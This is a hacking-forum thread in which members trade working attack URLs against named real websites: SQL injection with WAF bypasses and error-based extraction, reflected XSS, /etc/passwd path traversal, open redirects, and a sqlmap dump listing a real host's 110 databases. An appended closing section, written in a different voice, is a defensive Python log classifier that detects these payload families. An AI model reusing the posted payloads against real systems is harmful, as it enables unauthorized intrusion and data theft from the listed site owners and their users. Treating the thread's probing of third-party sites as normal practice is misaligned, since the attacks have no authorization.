SQLi, XSS and other vulnerabilities.

Discussion in 'Sandbox' started by Егорыч+++, 10 May 2015.

  1. BabaDook

    BabaDook Level 8

    Joined:
    9 May 2015
    Messages:
    822
    Likes Received:
    1,054
    Reputations:
    29
    HTML:
    https://www.mournhockey.com.ua/go.php?http://FFFFFFF.org
    http://iz.com.ua/engine/go.php?url=aHR0cDovL2dvb2dMZS5jb20=
    
    OpenRedirect

    HTML:
    https://bosa.in.ua/event/?id=1'+and+false+%55%6e%49%6f%4e+%2f%2a%21%31%32%33%34%35%53%65%4c%45%63%74%2a%2f+1,user(),3,4,5,6,7,8,9,database(),1,2,3,4,5,6,7,8,9,0,1,2,3,4,version(),6,7,8,9,0,1+--+-
     
    #301 BabaDook, 17 Mar 2018
    Last edited: 20 Mar 2018
  2. BabaDook

    BabaDook Level 8

    Joined:
    9 May 2015
    Messages:
    822
    Likes Received:
    1,054
    Reputations:
    29
    This is very strange, there are far more questions than answers here, but that's life.
    I decided to call this technique "Breaking it with a dildo".
    Unfortunately it gives us nothing, it just seemed funny to me.
     
    Vip77 and CKAP like this.
  3. Vip77

    Vip77 Elder - Старейшина

    Joined:
    29 Sep 2012
    Messages:
    312
    Likes Received:
    53
    Reputations:
    20
    Hahaha, interesting how that came into your head) Is the code word Avito? :D
     
  4. Vip77

    Vip77 Elder - Старейшина

    Joined:
    29 Sep 2012
    Messages:
    312
    Likes Received:
    53
    Reputations:
    20
    Code:
    https://www.edmunds.com/a/?":""});alert(document.cookie);//
    http://oregonstate.edu/training/course_search.php?subject="><script>alert(999)</script>
    https://lyricstranslate.com/?page="><script>alert(7889789)</script>
    http://720pizle.com/ara.asp?a="><script>alert(7889789)</script>
    http://epinions.com/search/books/63715?"><script>alert(6456456)</script>
    https://mgronline.com/south/1232/search?searchTxt="><script>alert(045839)</script>
    http://naszemiasto.pl/firmy/,polska,78425,21.html?miasto="><script>alert(4389)</script>
    http://www3.gogoanime.tv/"><script>alert(4389)</script>
    https://bursadabugun.com/ruya-tabirleri/?q[keyword]="><script>alert(4389)</script>
    https://computerhoy.com/listas/internet/mejores-cascos-auriculares-inalambricos-2016-32365?page=</title><script>alert(4389)</script>
    https://warframe.market/</script><script>alert(4389)</script>
    https://goal.in.th/%E0%B8%9C%E0%B8%A5%E0%B8%9A%E0%B8%AD%E0%B8%A5%E0%B8%A2%E0%B9%89%E0%B8%AD%E0%B8%99%E0%B8%AB%E0%B8%A5%E0%B8%B1%E0%B8%87/?Line="><script>alert(4389)</script>
    http://www.gazetevatan.com/Default.aspx?aType=';alert();//
    http://thebitcoincode.com/video.php?poster="><script>alert(4389)</script>
    https://gamebanana.com/tools?"><script>alert(4389)</script>
    https://indosport.com/"><script>alert(4389)</script>
    http://brasilescola.uol.com.br/"><script>alert(4389)</script>
    https://watchasian.co/"><script>alert(4389)</script>
    https://mgronline.com/south/1232/search?searchTxt="><script>alert(4389)</script>
    http://portail.free.fr/services/pagesjaunes/bons-plans.php?where="><script>alert(4389)</script>
    http://minnstate.edu/jobs/searchResults.php?"><script>alert(4389)</script>
    https://eadaily.com/"><script>alert(00088)</script>
    http://projectfreetv.bz/hd/project.php?title=<script>alert(4389)</script>
    http://cnrtl.fr/lexiques/morphalou/licence_morphalou.php?version="><script>alert(4389)</script>
    
     
    #304 Vip77, 23 Mar 2018
    Last edited: 23 Mar 2018
    man474019 and BabaDook like this.
  5. BabaDook

    BabaDook Level 8

    Joined:
    9 May 2015
    Messages:
    822
    Likes Received:
    1,054
    Reputations:
    29
    http://bgadmin.gov.ua/

    post:
    user_token='+and+extractvalue(0x0a,(concat(0x0a,(select+user()))))#

    result:
    <div class=empty>ПОМИЛКА <br>XPATH syntax error: '
    [email protected]'>>SELECT cvi_id,cvi_clc_id FROM admin_visits WHERE cvi_dom_id=1 AND cvi_token='' and extractvalue(0x0a,(concat(0x0a,(select user()))))#' AND cvi_ts_exit=0 LIMIT 1 (MYSQLi:1105)<br>/home/bingosites/bingo.softbi.info/phpsite/_engineBS.php (93)</div>
    Fatal error: Call to a member function fetch_assoc() on a non-object in /home/bingosites/bingo.softbi.info/phpsite/_engineBS.php on line 94



    http://ricplus.ru/view-news.php?id=1'+And+falsE+uNiOn+sEleCT+1,2,uSeR(),4+--+-
    http://bestindustrygroup.com/news.php?id=-1+UnIoN+SeLEct+1,2,3,user(),5,6,7+--+-
    http://www.niihim.ru/news.php?id=1+UnIoN+SeLEct+1,2,user(),4,5+--+-
     
    #305 BabaDook, 29 Mar 2018
    Last edited: 29 Mar 2018
    t0ma5, cat1vo and crlf like this.
  6. Octavian

    Octavian Member

    Joined:
    8 Jul 2015
    Messages:
    426
    Likes Received:
    76
    Reputations:
    18
    https://forum.antichat.ru/threads/426171/page-6
    Already posted this.
     
    sepo, BabaDook and crlf like this.
  7. BabaDook

    BabaDook Level 8

    Joined:
    9 May 2015
    Messages:
    822
    Likes Received:
    1,054
    Reputations:
    29
  8. fiji

    fiji New Member

    Joined:
    19 Oct 2018
    Messages:
    3
    Likes Received:
    0
    Reputations:
    5
    Code:
    http://wrestling.work/eventchapter.php?id=2%27+union+select+1,2,(select(@x)from(select(@x:=0x00),(select(0)from(tione_igs.applications)where(0x00)in(@x:=concat(@x,0x3c62723e,user,0x3a,pass))))x),4,5,6,7,8,9,10--+1
     
  9. lukeone

    lukeone Member

    Joined:
    7 May 2017
    Messages:
    6
    Likes Received:
    17
    Reputations:
    1
    Code:
    http://cpa-monsters.ru/" AND (SELECT 2809 FROM(SELECT COUNT(*),CONCAT(0x716b626a71,(SELECT (ELT(2809=2809,1))),0x716b766b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND "qGaW"="qGaW
    
    Parameter: #1* (URI)
    Type: boolean-based blind
    Title: MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)
    Payload: http://cpa-monsters.ru:80/" AND MAKE_SET(1782=1782,4508) AND "lURK"="lURK
    Vector: AND MAKE_SET([INFERENCE],[RANDNUM])
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: http://cpa-monsters.ru:80/" AND (SELECT 2809 FROM(SELECT COUNT(*),CONCAT(0x716b626a71,(SELECT (ELT(2809=2809,1))),0x716b766b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND "qGaW"="qGaW
    Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
    Type: stacked queries
    Title: MySQL > 5.0.11 stacked queries (comment)
    Payload: http://cpa-monsters.ru:80/";SELECT SLEEP(5)#
    Vector: ;SELECT IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])#
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: http://cpa-monsters.ru:80/" AND SLEEP(5) AND "IisV"="IisV
    Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])

    available databases [110]:
    [*] 1poverennaya.ru
    [*] 3dschool.akadem-art.ru
    [*] acmoda_fashion
    [*] akadem-art.ru
    [*] amsterdam.ru
    [*] amur-tiger
    [*] api.olit.su
    [*] apteki.ru
    [*] at
    [*] ayashiclimat
    [*] berendeevo
    [*] bitrix_55
    [*] cargoflies.ru
    [*] civlife
    [*] cookies
    [*] cpa
    [*] cpa-monsters.ru
    [*] crypto
    [*] cv79250_db
    [*] db1050525_rpfm
    [*] dev.check-car.io
    [*] dish.ru
    [*] docdoc
    [*] dojoy.ru
    [*] dreamwood
    [*] el-torg.ru
    [*] fefectu_fikcii
    [*] game4art.ru
    [*] gidrolica
    [*] greencontinent.bio
    [*] hockeyfamily
    [*] hostel
    [*] information_schema
    [*] informed
    [*] irasmarovoz
    [*] kordik-psyhelp
    [*] kz_health
    [*] lecture
    [*] led1080.ru
    [*] lesspas
    [*] light
    [*] lotmo
    [*] mailer
    [*] maxphoto
    [*] medelement.ru
    [*] messenger
    [*] metalnastil.ru
    [*] miel.ru
    [*] modelery
    [*] mototelega
    [*] mysql
    [*] nanokeratin-shop
    [*] new.olit.su
    [*] new_olit
    [*] newoleg
    [*] olit_su
    [*] olmatveeva.ru
    [*] pdns
    [*] performance_schema
    [*] photoluxor
    [*] picture
    [*] pineapple
    [*] powerdns
    [*] prazdnik
    [*] pressnastil.ru
    [*] profdoctors.ru
    [*] push
    [*] radio.ru
    [*] recraft.ru-yii
    [*] redmine
    [*] rekomendacii
    [*] remcraft.ru
    [*] remcraft.ru-new
    [*] remcraft.ru-new1!!
    [*] resthistory
    [*] rlogistika
    [*] seobirds
    [*] seorakerus
    [*] seowant.ru
    [*] sflegaladvice
    [*] siluet.su
    [*] sitemanager0
    [*] skld
    [*] social
    [*] sound_olit
    [*] sound_olit_su
    [*] sport
    [*] spz-rus.ru
    [*] stroynastil.ru
    [*] stroynastil.ru1
    [*] sveng
    [*] telegramm
    [*] test
    [*] umgear.ru
    [*] union.ru
    [*] union.ru-old
    [*] vault-pdm.ru
    [*] velespro.com
    [*] videoportal
    [*] visagestyle
    [*] water-check.ru
    [*] wawtalk.io
    [*] webmonsters
    [*] whoknow.ru
    [*] yandex_bot
    [*] yiilab
    [*] ymga.ru
    [*] ymga.ru-new
    [*] zabbix
    [*] zaem-info.ru
     
    karkajoi, Mie2soft and Octavian like this.
  10. Franky_T

    Franky_T Level 8

    Joined:
    6 Nov 2018
    Messages:
    7
    Likes Received:
    17
    Reputations:
    4
    Hello)
    First day on the forum, I'll give it a try too.

    1. SQL injection with WAF bypass
    Code:
    GET /noticia.php?id=-738+/*!50000union*/+/*!50000select*/+111,222,/*!50000gROup_cONcat(table_name,0x0a)%20*/,444,555,666,777,888,999,1010,1111,1212,1313,1414,1515,1616,1717+from+/*!50000inforMAtion_schema*/.tables+%20/*!50000wHEre*/+/*!50000taBLe_scheMA%20*/like+database()--+ HTTP/1.1
    Host: www.cdlmacapa.com.br
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:61.0) Gecko/20100101 Firefox/61.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    DNT: 1
    Connection: close
    Upgrade-Insecure-Requests: 1
    
    2. SQL injection with output in the error message
    Code:
    http://steelflex.com.br/subcategoria.php?id=1+AND+extractvalue(1,concat(0x3a,(select+user()+limit+0,1)))
    
     
  11. Franky_T

    Franky_T Level 8

    Joined:
    6 Nov 2018
    Messages:
    7
    Likes Received:
    17
    Reputations:
    4
    A bit more - LFI this time.
    Code:
    http://www.unisescon.org.br/index.php?pagina=/etc/passwd&evento=13774
    
    https://www.fecic.es/admin/index.php?pagina=descargar&doc=../../../../../../../../../../../../etc/passwd&linial=true&seccio=premsa&tipus=1&[email protected]
    
    http://www.bolyai-zenta.edu.rs/index.php?page=../../../../../../../../../../../etc/passwd
    
    http://www.crt.unige.it/EN/index.php?pagina=php://filter/convert.base64-encode/resource=/etc/passwd
    
    
     
    #312 Franky_T, 10 Nov 2018
    Last edited: 10 Nov 2018
    crlf, dmax0fw, Pirnazar and 2 others like this.
  12. BabaDook

    BabaDook Level 8

    Joined:
    9 May 2015
    Messages:
    822
    Likes Received:
    1,054
    Reputations:
    29

    Here it works without the limit
    http://steelflex.com.br/subcategoria.php?id=1+AND+extractvalue(1,concat(0x3a,(select+user())))

    Here it works like this
    http://www.crt.unige.it/EN/index.php?pagina=/etc/passwd
     
    Franky_T likes this.
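The payload families posted across this thread (union-based and error-based SQLi, the `/*!50000...*/` version-comment WAF bypass, `../` and `php://filter` LFI, reflected XSS, and open redirects through a URL in a query parameter) share a small set of markers that survive normalisation. The following is an added example for detection, not code from the thread or from any tool the posters used: a Python request-log classifier that URL-decodes, strips MySQL version comments and case-folds before matching, which is precisely the normalisation step a filter defeated by `/*!50000union*/` or `%55%6e%49%6f%4e` is missing. The sample request lines are constructed for the example (hosts are placeholders, values loosely modelled on the posted payloads), and the signature names are my own.

```python
import re
from typing import Dict, List
from urllib.parse import unquote_plus

# Constructed sample request lines (not real traffic); the first seven are
# loosely modelled on payload families seen in the thread, the last two are
# benign controls that a naive substring match would flag.
SAMPLE_REQUESTS = [
    "GET /event/?id=1'+and+false+%55%6e%49%6f%4e+/*!12345SeLEcT*/+1,user(),3--+- HTTP/1.1",
    "GET /noticia.php?id=-738+/*!50000union*/+/*!50000select*/+111,222 HTTP/1.1",
    "GET /subcategoria.php?id=1+AND+extractvalue(1,concat(0x3a,(select+user()))) HTTP/1.1",
    "GET /index.php?pagina=../../../../etc/passwd HTTP/1.1",
    "GET /index.php?pagina=php://filter/convert.base64-encode/resource=index.php HTTP/1.1",
    "GET /search.php?q=%22%3E%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1",
    "GET /go.php?url=http://example.org/ HTTP/1.1",
    "GET /news.php?id=42 HTTP/1.1",
    "GET /search.php?q=union+station+select+menu HTTP/1.1",
]

# /* ... */ comments that are NOT MySQL version comments: drop them entirely.
PLAIN_COMMENT = re.compile(r"/\*(?!!).*?\*/", re.S)
# MySQL version comment opener /*!50000 : the body is executed, so keep the body.
MYSQL_VERSION_COMMENT = re.compile(r"/\*!\d*")

# Signature names are this example's own labels, not a standard taxonomy.
SIGNATURES: Dict[str, "re.Pattern[str]"] = {
    "sqli-union": re.compile(r"\bunion\b(\s+all)?\s+select\b"),
    "sqli-error-based": re.compile(r"\b(extractvalue|updatexml)\s*\("),
    "sqli-boolean": re.compile(r"'\s*(and|or)\s+(false|true|\d+=\d+)\b"),
    "lfi-traversal": re.compile(r"(\.\./){2,}|/etc/passwd"),
    "lfi-php-wrapper": re.compile(r"\bphp://(filter|input)\b"),
    "xss-script-tag": re.compile(r"<\s*script\b|\balert\s*\("),
    # Any absolute URL as a parameter value: a redirect candidate worth review.
    "open-redirect-candidate": re.compile(r"[?&](\w+=)?https?://"),
}


def normalize(raw: str) -> str:
    """Canonicalise a request line the way the backend will see it.

    Decodes percent-encoding repeatedly (double encoding is a common bypass),
    treats '+' as a space (query-string semantics; a literal '+' in the path
    would be lost, which is acceptable for matching), removes plain comments,
    unwraps MySQL version comments, collapses whitespace and lower-cases.
    """
    s = raw
    for _ in range(3):
        decoded = unquote_plus(s)
        if decoded == s:
            break
        s = decoded
    s = PLAIN_COMMENT.sub(" ", s)
    s = MYSQL_VERSION_COMMENT.sub(" ", s)
    s = s.replace("*/", " ")
    s = re.sub(r"\s+", " ", s)
    return s.lower().strip()


def classify(raw: str) -> List[str]:
    """Return the sorted list of signature names that fire on one request line."""
    text = normalize(raw)
    return sorted(name for name, rx in SIGNATURES.items() if rx.search(text))


def scan(lines: List[str]) -> Dict[str, List[str]]:
    """Map each request line to its hits, keeping only lines that matched."""
    result: Dict[str, List[str]] = {}
    for line in lines:
        hits = classify(line)
        if hits:
            result[line] = hits
    return result


if __name__ == "__main__":
    for line, hits in scan(SAMPLE_REQUESTS).items():
        print(", ".join(hits).ljust(32), normalize(line))
```

The point of `normalize` is that matching happens on the decoded, comment-stripped form: `%55%6e%49%6f%4e` and `/*!50000union*/` both become `union`, so the signatures stay short and the benign "union station select menu" control is still not flagged because the words are not adjacent. Treat the "open-redirect-candidate" hits as triage input rather than alerts; an absolute URL in a parameter is common in legitimate traffic.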